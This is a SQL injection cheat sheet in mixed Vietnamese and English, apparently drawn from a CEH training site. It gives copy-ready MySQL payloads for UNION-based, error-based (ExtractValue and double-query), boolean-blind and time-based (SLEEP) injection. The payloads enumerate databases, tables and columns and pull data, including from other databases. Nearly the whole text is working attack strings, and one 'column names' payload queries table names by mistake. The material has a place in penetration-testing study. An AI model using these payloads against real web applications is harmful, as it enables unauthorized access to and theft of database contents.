Các khái niệm về câu lệnh SQLI

UNION

UNION được sử dụng để nối thêm querry SQL injection  đến một truy vấn hợp pháp và kết hợp các thông tin chúng ta muốn lấy với các truy vấn hợp pháp. Lưu ý rằng bạn cần phải liệt kê số các cột đầu tiên, điều này có thể đạt được bằng cách sử dụng các chức năng ORDER BY hoặc sử dụng UNION với các giá trị NULL.

Giả sử có hai cột:

Truy xuất database version:

1 UNION ALL SELECT NULL,version()--

Truy xuất database names:

1 UNION ALL SELECT NULL,concat(schema_name) FROM information_schema.schemata--

Truy xuất table names:

1 UNION ALL SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='database1'--

Truy xuất column names:

1 UNION ALL SELECT NULL,concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='table1'--

Truy xuất data:

1 UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM table1--

Truy xuất data from another database:

1 UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM database2.table1--

Error Based

When there is no output except a MySQL error, you can force your data extraction through the error. Note that both of the below methods can be easily automated using Burp’s Intruder and the grep extract functionality.

XPath

The ExtractValue() function generates a SQL error when it is unable to parse the XML data passed to it. Fortunately, the XML data, and, in our case, the evaluated results of our SQL query, will be be embedded into the subsequent error message. Prepending a full stop or a colon (we use the hex representation of 0x3a below) to the beginning of the XML query will ensure the parsing will always fail, thus generating an error with our extracted data. Note that this only works on MySQL version 5.1 or later. Use the LIMIT function to cycle through database information.

Truy xuất database version:

1 AND extractvalue(rand(),concat(0x3a,version()))--

Truy xuất database names:

1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 0,1)))--

Truy xuất table names:

1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1)))--

Truy xuất column names:

1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_NAME="table1" LIMIT 0,1)))--

Truy xuất data:

1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(column1,0x3a,column2) FROM table1 LIMIT 0,1)))--

Truy xuất data from another database:

1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(column1,0x3a,column2) FROM database2.table1 LIMIT 0,1)))--

Double Query

The functions used below combine to produce a query which is accepted by the MySQL compiler but errors at runtime. The error is then returned, but it evaluates and includes the subquery (due to the double select), thus returning the results of our injection to the page. Increment the first LIMIT to cycle through the database information.

Truy xuất database version:

1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--

Truy xuất database names:

1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.schemata GROUP BY a LIMIT 0,1)b)--

Truy xuất table names:

1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.TABLES GROUP BY a LIMIT 0,1)b)--

Truy xuất column names:

1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)--

Truy xuất data:

1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT column1 FROM table1 LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--

Truy xuất data from another database:

1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT column1 FROM database2.table1 LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--

Inferential

When no data or error messages are returned, you can use time delays or true/false responses to retrieve database information. Note that automated tools such as sqlmap significantly speed up the process.

Boolean

This type of extraction is used when the application returns differing results dependent on whether the SQL query we inject evaluates to true or false. If we convert each individual character of the piece of database information we wish to retrieve to their decimal representation using the ASCII function (table here), we can create true or false conditions using the greater than, less than and equals symbols. We can then cycle through the individual characters using the SUBSTRING function and the pieces of database information using the LIMIT function.

Test for the presence of the vulnerability. This query should result in the original page being displayed:

1 AND 1=1

Whilst this query should return a different page:

1 AND 1=2

Truy xuất version:

1 AND (ascii(substr((SELECT version()),1,1))) > 52--

Note, a better way to retrieve the version in this context is to use the LIKE function:

1 AND (SELECT version()) LIKE "5%"--

Truy xuất databases:

1 AND (ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1))) > 95--

Truy xuất tables:

1 AND (ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),1,1))) > 95--

Truy xuất columns:

1 AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),1,1))) > 95--

Truy xuất data:

1 AND (ascii(substr((SELECT column1 FROM table1 LIMIT 0,1),1,1))) > 95--

Truy xuất data from another database:

1 AND (ascii(substr((SELECT column1 FROM database2.table1 LIMIT 0,1),1,1))) > 95--

Time Based

If identical pages are returned for true or false responses, time delays can be created by the IF and SLEEP functions and used to deduce database information instead.

Kiểm tra lỗi:

1 AND sleep(10)--

Truy xuất version:

1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)--

Truy xuất version sử dụng LIKE:

1 AND IF((SELECT version()) LIKE "5%",sleep(10),NULL)--

Truy xuất databases:

1 AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--

Truy xuất tables:

1 AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),1,1))))> 95,sleep(10),NULL)--

Truy xuất columns:

1 AND IF(((ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--

Truy xuất data:

1 AND IF(((ascii(substr((SELECT column1 FROM table1 LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--

Truy xuất data from another database:

1 AND IF(((ascii(substr((SELECT column1 FROM database1.table1 LIMIT 0,1),1,1)))) >95,sleep(10),NULL)--

Nguồn: ceh.vn